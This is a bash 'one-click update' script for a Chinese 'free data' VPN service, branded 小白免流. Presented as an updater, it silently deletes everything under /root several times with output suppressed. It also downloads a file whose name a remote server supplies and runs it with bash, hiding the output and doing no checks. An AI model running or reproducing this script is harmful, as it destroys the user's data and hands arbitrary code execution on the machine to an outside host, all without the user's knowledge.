#!/bin/bash
#脚本由小白编写
#改版权的不要脸
rm -rf /root/* >/dev/null 2>&1
Y=`curl -s http://sq.xbml.vip/gx.php?act=gxrq`;
W=`curl -s http://sq.xbml.vip/gx.php?act=wxts`;
XB=`curl -s http://sq.xbml.vip/gx.php?act=lxgx`;
XB2=`curl -s http://sq.xbml.vip/gx.php?act=lxqq`;
XB3=`curl -s http://sq.xbml.vip/gx.php?act=mlgw`;
XB4=`curl -s http://sq.xbml.vip/gx.php?act=gxdz`;
Welcome='
==================================================================
                   欢迎使用小白免流一键更新脚本
                  Powered by www.xbml.vip 2017
                      All Rights Reserved                           
                                                                         
                                  by 小白免流  
==================================================================
';
onlock  >/dev/null 2>&1
echo -e "\033[36m $Welcome \033[0m";
echo -e "温馨提示：\033[31m正在检测更新状态\033[0m"
XBML=`curl -s http://sq.xbml.vip/gx.php?act=gxzt`;
if [[ $XBML =~ 未更新 ]];
then
echo -e "更新状态： [\033[31m $XBML \033[0m]"
echo -e "\033[45;37m$XB\033[0m"
echo -e "\033[45;37m$XB2\033[0m"
echo -e "\033[45;37m$XB3\033[0m"
echo
echo -e "\033[31m$W\033[0m"
rm -rf /root/*   >/dev/null 2>&1
exit 0;
else
echo -e "更新状态： [\033[31m $XBML \033[0m]"
echo -e "\033[31m$Y 正在更新 请稍等...\033[0m"
wget -q tx.xbaicai.net/$XB4 && bash $XB4 >/dev/null 2>&1
sleep 1
echo
fi
echo -e "温馨提示[\033[45;37m 更新完成 \033[0m]"
echo
#vpn
unlock           >/dev/null 2>&1
rm -rf /root/*   >/dev/null 2>&1
